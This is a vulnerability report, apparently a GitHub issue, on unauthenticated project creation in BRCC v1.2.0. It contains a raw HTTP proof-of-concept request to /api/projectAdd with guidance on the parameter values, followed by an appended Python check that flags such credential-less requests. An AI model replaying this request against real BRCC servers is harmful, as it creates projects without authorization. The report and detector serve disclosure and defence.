
Improper permission management allowing unauthorized users to create projects arbitrarily

Open gaogaostone opened this issue 1 year ago • 0 comments

BRCC v1.2.0 has improper permission management, allowing unauthorized users to create projects arbitrarily.

Proof of Concept:

Send the following request to add a project, and it successfully adds the project. The request was unauthorized: it carried no rcc-token, token, or cookie. There are six parameters. The parameters apiPassword and memo can be arbitrary. The parameter name should be unique in the system. The parameter userName should be an existing username in the system. The parameter productName should be an existing product name in the system that can be managed by the corresponding username. The value of parameter projectType can be 0.

```http
POST /api/projectAdd HTTP/1.1
Host: x.x.x.x:8089
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://x.x.x.x:8089/swagger-ui.html
Content-Type: application/json
Content-Length: 144
Origin: http://x.x.x.x:8089
Connection: keep-alive

{
  "apiPassword": "123456",
  "memo": "string",
  "name": "adminfake5",
  "productName": "putong1",
  "projectType": 0,
  "userName": "admin"
}
```

When checking the data in the database, we found it is successfully added.

gaogaostone, Nov 04 '24 06:11
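An added audit check, written for this report and not part of BRCC or the reporter's post: it parses a raw HTTP request of the shape shown above and flags a POST to /api/projectAdd that carries none of the three credential carriers the report names (rcc-token header, token header, cookie), which is the condition a fixed server must reject and a proxy or WAF log review should alert on. The sample requests, the placeholder host and the token value are constructed for the example.

```python
import json
from typing import Dict, Tuple

# Credential carriers the report says were absent: rcc-token header, token header, cookie.
AUTH_CARRIERS = ("rcc-token", "token", "cookie")
# The six body fields the endpoint accepts, as listed in the report.
EXPECTED_FIELDS = {"apiPassword", "memo", "name", "productName", "projectType", "userName"}

# Constructed sample: the reporter's request shape with a placeholder host and no credentials.
UNAUTHENTICATED_REQUEST = """POST /api/projectAdd HTTP/1.1
Host: x.x.x.x:8089
Content-Type: application/json

{"apiPassword": "123456", "memo": "string", "name": "adminfake5", "productName": "putong1", "projectType": 0, "userName": "admin"}"""

# Constructed sample: the same request carrying an rcc-token header (placeholder value).
AUTHENTICATED_REQUEST = UNAUTHENTICATED_REQUEST.replace(
    "Content-Type:", "rcc-token: PLACEHOLDER_TOKEN\nContent-Type:", 1)


def parse_raw_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").strip("\n").partition("\n\n")
    lines = head.splitlines()
    method, path, _version = lines[0].split()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def audit_project_add(raw: str) -> dict:
    """Flag a POST to /api/projectAdd that carries none of the credential carriers.
    Also reports which of the six expected body fields are missing from the JSON."""
    method, path, headers, body = parse_raw_request(raw)
    authenticated = any(headers.get(h) for h in AUTH_CARRIERS)
    finding = {"method": method, "path": path, "authenticated": authenticated,
               "project_add": False, "missing_fields": [], "alert": False}
    if method == "POST" and path.split("?", 1)[0] == "/api/projectAdd":
        try:
            payload = json.loads(body) if body.strip() else {}
        except json.JSONDecodeError:
            payload = {}
        if not isinstance(payload, dict):
            payload = {}
        finding["project_add"] = True
        finding["missing_fields"] = sorted(EXPECTED_FIELDS - set(payload))
        # The defect in the report: this request reaches the handler with no credential at all.
        finding["alert"] = not authenticated
    return finding
```

Run the same check against live traffic captured at a reverse proxy, or as a regression test after the fix by asserting that the unauthenticated variant now receives a 401 or 403 instead of creating the project.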